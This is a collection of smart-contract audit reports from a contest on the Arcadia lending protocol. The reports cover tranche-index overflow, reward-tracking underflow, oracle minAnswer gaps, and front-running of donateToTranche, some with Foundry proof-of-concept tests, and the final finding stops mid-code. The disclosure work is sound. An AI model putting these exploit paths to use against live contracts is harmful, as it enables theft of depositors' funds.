medium

It is possible to create more than 256 tranches.

Summary

The protocol invariant maximum number of associated tranches for a single lending pool (256) can be invalidated.

Vulnerability Detail

The README.md for the contest specifically highlights the invariant that:

No more than 256 tranches to a single lending pool.

However, this upper limit is not enforced.

In the snippet below, we demonstrate that an authorized owner can add more tranches than the intended protocol invariant maximum:

📄 AddTranche.fuzz.t.sol

/// @dev Demonstrate that we can add an arbitrary number of tranches.
function test_tooManyTranches() public {

    /// @dev Here, we iterate past the invariant `256` tranches. This can continue indefinitely.
    for (uint256 i; i < 256 + 1; ++i) {

      address trancheAddress = address(uint160(i + 0x6969));

      vm.prank(users.creatorAddress);
        pool_.addTranche(trancheAddress, 10 /* interestWeight */);

    }
}

This issue likely arises from the fact that a uint8 is used to uniquely identify lending pool tranches, the assumption being that this value cannot normally overflow outside of an unchecked block.

However, the array length is cast directly to a uint8, resulting in truncation of the identifier and leading to the insertion of tranches past the intended maximum:

/**
 * @notice Adds a tranche to the Lending Pool.
 * @param tranche The address of the Tranche.
 * @param interestWeight_ The interest weight of the specific Tranche.
 * @dev The order of the tranches is important, the most senior tranche is added first at index 0, the most junior at the last index.
 * @dev Each Tranche is an ERC4626 contract.
 * @dev The interest weight of each Tranche determines the relative share of the yield (interest payments) that goes to its Liquidity providers.
 */
function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
    if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
    if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

    totalInterestWeight += interestWeight_;
    interestWeightTranches.push(interestWeight_);
    interestWeight[tranche] = interestWeight_;

@>  uint8 trancheIndex = uint8(tranches.length); /// @audit integer_overflow
    tranches.push(tranche);
    isTranche[tranche] = true;

    emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
}

This permits an arbitrary number of tranches to be associated with a single LendingPool, defeating the protocol invariant and introducing a number of highly undesirable second-order effects on pool operation due to identifier collisions.

Impact

Medium - we demonstrate that we have undermined an explicitly-documented protocol invariant, however unlikely this would be to happen in production.

Code Snippet

/**
 * @notice Adds a tranche to the Lending Pool.
 * @param tranche The address of the Tranche.
 * @param interestWeight_ The interest weight of the specific Tranche.
 * @dev The order of the tranches is important, the most senior tranche is added first at index 0, the most junior at the last index.
 * @dev Each Tranche is an ERC4626 contract.
 * @dev The interest weight of each Tranche determines the relative share of the yield (interest payments) that goes to its Liquidity providers.
 */
function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
    if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
    if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

    totalInterestWeight += interestWeight_;
    interestWeightTranches.push(interestWeight_);
    interestWeight[tranche] = interestWeight_;

    uint8 trancheIndex = uint8(tranches.length);
    tranches.push(tranche);
    isTranche[tranche] = true;

    emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
}

Tool used

Foundry

Recommendation

Use SafeCastLib.safeCastTo8 to implicitly revert for excessive numbers of tranches.

📄 LendingPool.sol

- uint8 trancheIndex = uint8(tranches.length);
+ uint8 trancheIndex = SafeCastLib.safeCastTo8(tranches.length);
tranches.push(tranche);
isTranche[tranche] = true;

Duplicate of #32

mstpr-brainbot - Staked stargate asset module STG reward tracking can underflow blocking all interactions

mstpr-brainbot

high

Staked stargate asset module STG reward tracking can underflow blocking all interactions

Summary

When users deposit to the staked Stargate AM, the reward tracking can underflow; hence, all interactions with the staked Stargate AM will revert.

Vulnerability Detail

When users deposit to the Staked Stargate Asset Module, the module updates its reward tracking internally as seen here:
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L529-L569

The problem is the underflow happening in these lines:

if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction. // @review UNDERFLOW!
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);

When a deposit occurs in the Stargate masterchef contract, the rewards are automatically claimed, resulting in a claimable balance of "0" whenever someone mints a new token.

The getCurrentReward function provides the rewards that have become claimable since the asset module last interacted with the Stargate masterchef. This value is not necessarily greater than the assetState.lastRewardGlobal value.

Textual Proof of Concept (PoC):
Alice mints a token at t=0, assuming 1 STG reward accrues to the staked Stargate AM every second.

At t=10, Bob joins and mints a staked Stargate AM NFT like Alice. When the deposit happens, the 10 STG rewards will be claimed from the Stargate masterchef contract, setting lastRewardGlobal to 10.

At t=12, Carol attempts to join and mint a staked Stargate AM. However, since the current reward global is "2" (time passed since the last interaction) and lastRewardGlobal is 10, these lines will underflow, causing the transaction to revert:
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;

All functions of the staked Stargate AM will revert until t=20, when there will be 10 STG again and the operation no longer underflows.

Coded PoC:

// forge test --fork-url https://mainnet.base.org --match-contract StargateAM_USDbC_Fork_Test --match-test test_StgRewardTracking_Underflows -vv 
    function test_StgRewardTracking_Underflows() public {
        uint amount = 10 * 1e6;

        // Deposit 10 tokens
        uint256 lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);

        // Check the deposit went thru
        (bool allowed, uint128 lastRewardPerTokenGlobal, uint128 lastRewardGlobal, uint128 totalStaked) = stakedStargateAM.assetState(address(pool));
        (address _asset, uint128 _amountStaked, uint128 _lastRewardPerTokenPosition, uint128 _lastRewardPosition) = stakedStargateAM.positionState(1);
        assertEq(totalStaked, lpBalance);
        assertEq(_amountStaked, lpBalance);
        
        // Accrue some STG tokens
        skip(10 days);

        // deposit an another 10 tokens, this will claim the pending STG
        lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);

        // skip 1 more day, since 10 days STG yield is more than 1 day STG yield this will underflow!
        skip(1 days);
        lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);
    }

Impact

All staked Stargate AM interactions will be reverting due to underflow.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L529-L569

Tool used

Manual Review

Recommendation

Duplicate of #38

dany.armstrong90 - Donation may be added to zero address.

dany.armstrong90

medium

Donation may be added to zero address.

Summary

The LendingPool.sol#donateToTranche function does not check whether trancheIndex is valid.
So the donated assets may be credited to the zero address instead of the intended tranche.

Vulnerability Detail

LendingPool.sol#donateToTranche function is the following.

    function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
        if (assets == 0) revert LendingPoolErrors.ZeroAmount();

353:    address tranche = tranches[trancheIndex];

        // Need to transfer before donating or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(msg.sender, address(this), assets);

        unchecked {
360:        realisedLiquidityOf[tranche] += assets; //[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
        }
    }

As can be seen, the above function does not check if trancheIndex is valid.
If trancheIndex >= tranches.length, then tranche = address(0) holds in L353.
So the donated assets may be credited to the zero address instead of the intended tranche in L360.

Example:

  1. The administrator tries to donate assets to the junior tranche by calling the donateToTranche function.
  2. While the admin's tx sits in the mempool, the junior tranche is popped by the unhappy liquidation flow.
  3. The donated assets are credited to the zero address.

Impact

The donation process may misbehave and the donated assets will not be credited to the intended tranche.
There is no way of withdrawing these assets from the contract.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L353

Tool used

Manual Review

Recommendation

Modify the LendingPool.sol#donateToTranche function as follows.

    function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
        if (assets == 0) revert LendingPoolErrors.ZeroAmount();
++      if (trancheIndex >= tranches.length) revert LendingPoolErrors.NonExistingTranche();

        address tranche = tranches[trancheIndex];

        // Need to transfer before donating or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(msg.sender, address(this), assets);

        unchecked {
            realisedLiquidityOf[tranche] += assets; //[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
        }
    }

Duplicate of #199

dany.armstrong90 - Administrator cannot get liquidity of treasury correctly.

dany.armstrong90

medium

Administrator cannot get liquidity of treasury correctly.

Summary

The administrator can get the liquidity of the treasury by calling the LendingPool.sol#liquidityOf function.
In the case of lastSyncedTimestamp != block.timestamp, the return value does not contain the unrealised interest.

Vulnerability Detail

LendingPool.sol#liquidityOf function is the following.

    function liquidityOf(address owner_) external view returns (uint256 assets) {
        // Avoid a second calculation of unrealised debt (expensive).
        // if interests are already synced this block.
643:    if (lastSyncedTimestamp != uint32(block.timestamp)) {
            // The total liquidity of a tranche equals the sum of the realised liquidity
            // of the tranche, and its pending interests.
646:        uint256 interest = calcUnrealisedDebt().mulDivDown(interestWeight[owner_], totalInterestWeight);
            unchecked {
                assets = realisedLiquidityOf[owner_] + interest;
            }
        } else {
            assets = realisedLiquidityOf[owner_];
        }
    }

In the case of lastSyncedTimestamp != block.timestamp, the above function calculates the unrealised interest using the interestWeight state variable.

On the other hand, LendingPool.sol#setTreasuryWeights function is the following.

    function setTreasuryWeights(uint16 interestWeight_, uint16 liquidationWeight) external onlyOwner processInterests {
        totalInterestWeight = totalInterestWeight - interestWeightTreasury + interestWeight_;

        emit TreasuryWeightsUpdated(
            interestWeightTreasury = interestWeight_, liquidationWeightTreasury = liquidationWeight
        );
    }

As can be seen, the above function does not set the interestWeight state variable, so interestWeight[treasury] == 0 always holds.
Thus, when owner_ = treasury in the liquidityOf function, interest = 0 holds in L646.

In the meantime, the administrator can also get the liquidity of the treasury by calling the LendingPool.sol#liquidityOfAndSync function, but that function has no view modifier, so it requires a transaction to be mined and consumes more gas.

Impact

Administrator cannot get liquidity of treasury correctly.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L646

Tool used

Manual Review

Recommendation

Modify LendingPool.sol#liquidityOf function as follows.

    function liquidityOf(address owner_) external view returns (uint256 assets) {
        // Avoid a second calculation of unrealised debt (expensive).
        // if interests are already synced this block.
        if (lastSyncedTimestamp != uint32(block.timestamp)) {
            // The total liquidity of a tranche equals the sum of the realised liquidity
            // of the tranche, and its pending interests.
--          uint256 interest = calcUnrealisedDebt().mulDivDown(interestWeight[owner_], totalInterestWeight);
++          uint256 weight = interestWeight[owner_];
++          if (owner_ == treasury) {
++              weight = interestWeightTreasury;
++          }
++          uint256 interest = calcUnrealisedDebt().mulDivDown(weight, totalInterestWeight);
            unchecked {
                assets = realisedLiquidityOf[owner_] + interest;
            }
        } else {
            assets = realisedLiquidityOf[owner_];
        }
    }

Duplicate of #169

n1punp - Guardian may not be able to `pause` the protocol under certain conditions.

n1punp

high

Guardian may not be able to pause the protocol under certain conditions.

Summary

Guardian may not be able to pause the protocol under certain conditions. To be precise, these are some of the possible scenarios:

Scenario 1:

  1. At day 0, Guardian paused the protocol to investigate any issues.
  2. Quickly after the guardian resolved the issues, the Owner unpaused the protocol.
  3. Now, between day 0 to 32, the guardian can no longer pause the protocol the second time.

Scenario 2:

  1. At day 0, Guardian paused the protocol.
  2. At day 30, someone calls unpause public function to allow repay, withdraw, and liquidation.
  3. Now, if unexpected event happens between day 30 to 32, the guardian can no longer pause the protocol again.

Vulnerability Detail

The pause function by the owner can only pause once every 32 days. When the pause is called, pauseTimestamp is updated to the block timestamp at execution.

However, there are 2 ways to unpause:

  1. Guardian unpause -- this simply tries to unpause, but does not reset the cooldown.
  2. Public unpause -- this can only be called after day +30.

However, neither of the unpause paths actually resets the pauseTimestamp. This means that after the first pause, a second pause can only happen more than 32 days later. But in fact, the guardian may need to pause the protocol more than once within that 32-day window (see the example scenarios above).

Impact

Guardian may not be able to pause the protocol when they want to.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/guardians/LendingPoolGuardian.sol#L103

Tool used

Manual Review

Recommendation

  • Consider resetting pauseTimestamp when unpausing. This, however, may add other complications (see the sketch after this list).
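
A minimal sketch of that idea in the owner's unpause path (the function shape is illustrative; the real LendingPoolGuardian signature and flags differ):

// Sketch only: clear the cool-down when the owner unpauses, so the guardian can pause
// again before the original 32-day window has elapsed.
function unpause( /* ...pause flags... */ ) external onlyOwner {
    // ... existing flag updates ...
    pauseTimestamp = 0;
}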

web3_r - User can lose assets when withdrawing or redeeming from Tranche.sol

web3_r

high

User can lose assets when withdrawing or redeeming from Tranche.sol

Summary

When calling withdraw or redeem in Tranche.sol, a user can lose their assets.

Vulnerability Detail

User shares are burnt before checking whether the requested assets are <= the user's actual share of the pool.

This check takes place in LENDING_POOL.withdrawFromLendingPool, which reverts if the requested assets exceed realisedLiquidityOf[msg.sender].

Impact

Users could permanently lose access to their funds in the pool.

Code Snippet

   function withdraw(uint256 assets, address receiver, address owner_)
        public
        override
        notLocked
        notDuringAuction
        returns (uint256 shares)
    {
        // No need to check for rounding error, previewWithdraw rounds up.
        shares = previewWithdrawAndSync(assets);

        if (msg.sender != owner_) {
            // Saves gas for limited approvals.
            uint256 allowed = allowance[owner_][msg.sender];

            if (allowed != type(uint256).max) allowance[owner_][msg.sender] = allowed - shares;
        }

        _burn(owner_, shares); //  <= burn before check

        LENDING_POOL.withdrawFromLendingPool(assets, receiver);

        emit Withdraw(msg.sender, receiver, owner_, assets, shares);
    }
  function redeem(uint256 shares, address receiver, address owner_)
        public
        override
        notLocked
        notDuringAuction
        returns (uint256 assets)
    {
        if (msg.sender != owner_) {
            // Saves gas for limited approvals.
            uint256 allowed = allowance[owner_][msg.sender];

            if (allowed != type(uint256).max) allowance[owner_][msg.sender] = allowed - shares;
        }

        // Check for rounding error since we round down in previewRedeem.
        if ((assets = previewRedeemAndSync(shares)) == 0) revert TrancheErrors.ZeroAssets();

        _burn(owner_, shares); // <= burn before check

        LENDING_POOL.withdrawFromLendingPool(assets, receiver);

        emit Withdraw(msg.sender, receiver, owner_, assets, shares);
    }

Tool used

Manual Review

Recommendation

Check that the pool balance is sufficient to cover the withdrawal before burning the owner's shares (see the sketch below).
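A function-level sketch of that ordering, based on the withdraw function quoted above; it assumes LENDING_POOL exposes a view such as liquidityOf(address) returning the tranche's realised liquidity, and the revert reason is illustrative:

function withdraw(uint256 assets, address receiver, address owner_)
    public
    override
    notLocked
    notDuringAuction
    returns (uint256 shares)
{
    // No need to check for rounding error, previewWithdraw rounds up.
    shares = previewWithdrawAndSync(assets);

    if (msg.sender != owner_) {
        // Saves gas for limited approvals.
        uint256 allowed = allowance[owner_][msg.sender];
        if (allowed != type(uint256).max) allowance[owner_][msg.sender] = allowed - shares;
    }

    // Suggested: verify the pool can pay out `assets` for this tranche before burning shares.
    if (LENDING_POOL.liquidityOf(address(this)) < assets) revert("insufficient tranche liquidity");

    _burn(owner_, shares);

    LENDING_POOL.withdrawFromLendingPool(assets, receiver);

    emit Withdraw(msg.sender, receiver, owner_, assets, shares);
}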

0xrice.cooker - Chainlink on Optimism does not currently provide a price feed for the Stargate token

0xrice.cooker

medium

Chainlink on Optimism does not currently provide a price feed for the Stargate token

Summary

Chainlink on Optimism does not currently provide a price feed for the Stargate token.

Vulnerability Detail

Per the README, Arcadia supports the Optimism chain and the STG token, but Chainlink does not provide a price feed for the Stargate token on Optimism.

Impact

According to the Sherlock docs, this issue is a medium because it breaks core contract functionality:

Breaks core contract functionality, rendering the contract useless or leading to loss of funds.

Code Snippet

https://docs.chain.link/data-feeds/price-feeds/addresses?network=optimism&page=1&search=stg
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L118C1-L129C6

Tool used

Manual Review

Recommendation

Wait for Chainlink to support this feed, or switch to an alternative oracle.

mstpr-brainbot - Creditors can be over-exposed to the Stargate reward token

mstpr-brainbot

medium

Creditors can be over-exposed to the Stargate reward token

Summary

When a staked Stargate position is added to a user's account, the claimable reward tokens are also accounted for. However, the claimable reward balance is never updated afterwards, so exposure to the reward token can exceed the max exposure limit a creditor has set for it.

Vulnerability Detail

When a new deposit is made into the Staked Stargate position, the reward tokens are included as part of the underlying assets. The issue arises from the fact that the exposure is only calculated at the time of deposit, and if the account does not claim or withdraw the accrued reward tokens, they will not be considered in the exposure calculation.

Textual PoC:
Let's assume the reward token is STG, and the maximum exposure for creditor "A" in STG tokens is 100K, with 70K STG already deposited, leaving only 30K STG available for exposure.

Now, suppose Alice, Bob, and Carol deposit significant amounts of Stargate staked LP, earning 5K STG tokens every week. Since the initial deposit, there were no accrued reward tokens, and thus, no new STG exposure was credited to the creditor.

After 10 weeks, there are 50K STG claimable by all users, but the recorded exposure remains at 70K, with 30K STG available for additional deposits. Another 10 weeks pass; there are now 100K STG claimable, and an additional 30K STG has been deposited by other users. The recorded exposure has now reached 100K STG, the creditor's intended maximum. However, the 100K STG claimable by the staked Stargate AM stakers is also counted as value, further increasing the effective exposure, and it keeps growing as long as the stakers do not withdraw their portion. This claimable STG is also counted as account value, so it can back debt on top of pushing the creditor past its exposure limit.

Impact

A creditor can be over-exposed to an asset beyond its intended limit.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L174-L191

Tool used

Manual Review

Recommendation

Whenever someone deposits into their account, consider the cumulative pending reward tokens rather than only the STG claimable by individual positions.

jesjupyer - Lack of `minAnswer` check for oracle may lead to bad pricing during flash crashes

jesjupyer

medium

Lack of minAnswer check for oracle may lead to bad pricing during flash crashes

Summary

Chainlink price feeds have built-in minimum and maximum prices they will return. During a black-swan event such as a flash crash (e.g. LUNA), even if the price of an asset falls below the feed's minimum price, only the minimum price is returned. If the minAnswer check is not performed, the returned answer is therefore incorrect, which can lead to severely mispriced collateral; for example, an account that should be liquidated will remain healthy.

Vulnerability Detail

In ChainlinkOM::_getLatestAnswer, the answer_ is not compared with minAnswer and maxAnswer which should be queried from Aggregator.

        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
                roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }

The problem is that Chainlink price feeds have built-in minimum and maximum prices they will return. During a black-swan event such as a flash crash (e.g. LUNA), even if the price of an asset falls below the feed's minimum price, only the minimum price is returned.

Since this contract uses Oracle to calculate the price of an asset, this will lead to the following situation:

  1. A coin has experienced a flash crash, and its price goes down to $0.05.
  2. The minAnswer in the Aggregator is set to be $0.1 and is not updated.
  3. The returned value of the price will be much higher than what it should be.

As a consequence, an account that should be liquidated could remain healthy. The user could buy the coin at market price and deposit it into the protocol to avoid liquidation.

Impact

The lack of a minAnswer check can lead to bad pricing. As a consequence, an account that should be liquidated could remain healthy, and a user could buy the coin at market price and deposit it into the protocol to avoid liquidation. The liquidation mechanism is thus greatly affected.

Code Snippet

ChainlinkOM::_getLatestAnswer

        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
                roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }

Tool used

Manual Review, VSCode

Recommendation

Add a check that the answer falls within the range (minAnswer, maxAnswer) so that the price is valid (see the sketch below).
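An illustrative sketch of such a check, not Arcadia code. It assumes the configured oracle is a Chainlink proxy exposing aggregator() and that the underlying aggregator exposes minAnswer()/maxAnswer(); both minimal interfaces below are assumptions for this sketch:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

interface IChainlinkProxy {
    function aggregator() external view returns (address);
}

interface IChainlinkAggregatorBounds {
    function minAnswer() external view returns (int192);
    function maxAnswer() external view returns (int192);
}

library ChainlinkBoundsCheck {
    // Returns false when the answer is pinned at the aggregator's configured bounds.
    function answerWithinBounds(address oracle, int256 answer_) internal view returns (bool) {
        address aggregator_ = IChainlinkProxy(oracle).aggregator();
        int256 minAnswer = IChainlinkAggregatorBounds(aggregator_).minAnswer();
        int256 maxAnswer = IChainlinkAggregatorBounds(aggregator_).maxAnswer();
        return answer_ > minAnswer && answer_ < maxAnswer;
    }
}

The result could then be added as an extra condition alongside the existing roundId and updatedAt checks in _getLatestAnswer.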

erosjohn - LendingPool.sol#donateToTranche is vulnerable to reward hunting attacks through front-running

erosjohn

high

LendingPool.sol#donateToTranche is vulnerable to reward hunting attacks through front-running

Summary

In deposit/mint and withdraw/redeem of Tranche.sol, there are no cooling-down periods or fees, so users can deposit or withdraw assets at any time. donateToTranche in LendingPool.sol causes a step change in realisedLiquidityOf[tranche]. Attackers can front-run donateToTranche with a deposit and then withdraw immediately afterwards, capturing the donated rewards without any effort.

Vulnerability Detail

The donateToTranche function is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime, and it can be used by anyone to donate assets to the Lending Pool.
The specific code is as follows.

function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
    if (assets == 0) revert LendingPoolErrors.ZeroAmount();

    address tranche = tranches[trancheIndex];

    // Need to transfer before donating or ERC777s could reenter.
    // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
    asset.safeTransferFrom(msg.sender, address(this), assets);

    unchecked {
@>      realisedLiquidityOf[tranche] += assets;
        totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
    }
}

realisedLiquidityOf[tranche] += assets causes the recorded liquidity of the tranche to increase.

function liquidityOfAndSync(address owner_) external returns (uint256 assets) {
    _syncInterests();
@>  assets = realisedLiquidityOf[owner_];
}
function totalAssetsAndSync() public returns (uint256 assets) {
@>  assets = LENDING_POOL.liquidityOfAndSync(address(this));
}

As the code above shows, the increased realisedLiquidityOf[tranche] is used to calculate the total assets in Tranche.sol.
So the attacker can deposit/mint right before donateToTranche and withdraw/redeem right after it. In other words, the step change in realisedLiquidityOf[tranche] enables front-running and sandwich attacks.

Impact

The attacker steals rewards that do not belong to them through this attack (deposit, then immediately withdraw), because they never provided usable assets to LendingPool.sol.
Consider the following scenario:

  1. An auction didn't get sold and was manually liquidated after cutoffTime
  2. The attacker deposits some assets into the target tranche
  3. donateToTranche is called to compensate the target tranche
  4. The attacker withdraws all their assets, receiving more than they deposited

The following code demonstrates this scenario; add the test_Deposit_Donate_Withdraw function to Deposit.fuzz.t.sol and run it.

function test_Deposit_Donate_Withdraw() public {
    // Prepare
    vm.prank(users.liquidityProvider);
    asset.burn(type(uint256).max / 2);
    vm.prank(users.tokenCreatorAddress);
    asset.mint(users.swapper, type(uint256).max / 2) ;
    vm.prank(users.swapper);
    asset.approve(address(pool), type(uint256).max / 2);
    // Imitate that the tranche already minted some shares
    vm.prank(users.swapper);
    tranche.deposit(1000 ether, users.swapper);

    // POC start: Alice wants to launch a Sandwich Attack
    // Before donate, alice deposits
    uint256 assetsInput = 10 ether;
    vm.prank(users.liquidityProvider);
    tranche.deposit(assetsInput, users.liquidityProvider);
    // Someone donates some assets
    vm.prank(users.swapper);
    pool.donateToTranche(0, 10 ether);
    // After donate, alice withdraws
    vm.prank(users.liquidityProvider);
    assertGt(tranche.maxWithdraw(users.liquidityProvider), assetsInput);
}

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/Tranche.sol#L156-L261
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L350-L361

Tool used

Manual Review

Recommendation

  1. A stepwise increase that affects rewards is an unreasonable model and should be avoided as much as possible.
  2. Add cooling-down periods and/or fees to prevent reward hunting (see the sketch after this list).
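A minimal sketch of option 2 (a deposit cooldown), not Arcadia code; the 1-day duration, names, and hook placement are illustrative assumptions:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

// Sketch: block withdrawals for a short period after a deposit so that a
// deposit sandwiched around donateToTranche cannot be exited immediately.
abstract contract DepositCooldown {
    uint256 internal constant COOLDOWN = 1 days;
    mapping(address => uint256) internal lastDepositTimestamp;

    // Call from deposit/mint after shares are minted to `receiver`.
    function _recordDeposit(address receiver) internal {
        lastDepositTimestamp[receiver] = block.timestamp;
    }

    // Call from withdraw/redeem before shares are burned from `owner_`.
    function _checkCooldown(address owner_) internal view {
        require(block.timestamp >= lastDepositTimestamp[owner_] + COOLDOWN, "cooldown active");
    }
}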

Duplicate of #121

Hajime - LendingPool.startLiquidation() can be called several times for one position

Hajime

medium

LendingPool.startLiquidation() can be called several times for one position

Summary

startLiquidation() can be called several times for one position in LendingPool.sol

Vulnerability Detail

On each call of startLiquidation(), the initiationReward is added to realisedLiquidityOf, thus increasing the initiator's reward.

function startLiquidation(address initiator, uint256 minimumMargin_)
        external
        override
        whenLiquidationNotPaused
        processInterests
        returns (uint256 startDebt)
    {

        // @audit there is no verification that liquidation has begun

        // Only Accounts can have debt, and debtTokens are non-transferrable.
        // Hence by checking that the balance of the msg.sender is not 0,
        // we know that the sender is indeed an Account and has debt.
        startDebt = maxWithdraw(msg.sender);
        if (startDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();

        // Calculate liquidation incentives which have to be paid by the Account owner and are minted
        // as extra debt to the Account.
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);

        // Mint the liquidation incentives as extra debt towards the Account.
        _deposit(initiationReward + liquidationPenalty + terminationReward, msg.sender);

        // Increase the realised liquidity for the initiator.
        // The other incentives will only be added as realised liquidity for the respective actors
        // after the auction is finished.
        realisedLiquidityOf[initiator] += initiationReward;
        totalRealisedLiquidity = SafeCastLib.safeCastTo128(totalRealisedLiquidity + initiationReward);

        // If this is the sole ongoing auction, prevent any deposits and withdrawals in the most jr tranche
        if (auctionsInProgress == 0 && tranches.length > 0) {
            unchecked {
                ITranche(tranches[tranches.length - 1]).setAuctionInProgress(true);
            }
        }

        unchecked {
            ++auctionsInProgress;
        }

        // Emit event
        emit AuctionStarted(msg.sender, address(this), uint128(startDebt));
    }

Impact

Because there is no check on whether liquidation has already started, the function can be called several times for one account, allowing an attacker to increase their own initiationReward.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L861-L901

Tool used

Manual Review

Recommendation

Add a check that liquidation has not already started for the account and use nonReentrant (a sketch follows below).
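A minimal sketch of such a guard, not the actual LendingPool code; the mapping and error names are illustrative assumptions, and the flag would be cleared again in the settlement functions (e.g. settleLiquidationUnhappyFlow):

// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

abstract contract LiquidationStartGuard {
    error AuctionAlreadyOngoing();

    // Tracks Accounts for which startLiquidation has already been called.
    mapping(address => bool) internal auctionOngoing;

    // Call at the top of startLiquidation with the Account (msg.sender).
    function _markAuctionStarted(address account) internal {
        if (auctionOngoing[account]) revert AuctionAlreadyOngoing();
        auctionOngoing[account] = true;
    }

    // Call when the auction for the Account is settled.
    function _markAuctionSettled(address account) internal {
        auctionOngoing[account] = false;
    }
}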

deth - AbstractStakingAM.sol#_getRewardBalances() - Incorrect logic inside the reward calculation leads to a revert, freezing user funds and miscalculating user rewards

deth

high

AbstractStakingAM.sol#_getRewardBalances() - Incorrect logic inside the reward calculation leads to a revert, freezing user funds and miscalculating user rewards

Summary

Incorrect logic inside the reward calculation leads to a revert, freezing user funds and miscalculating user rewards.

Vulnerability Detail

_getRewardBalances is used to calculate the current global and position specific rewards for contracts that inherit from AbstractStakingAM

function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {   
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
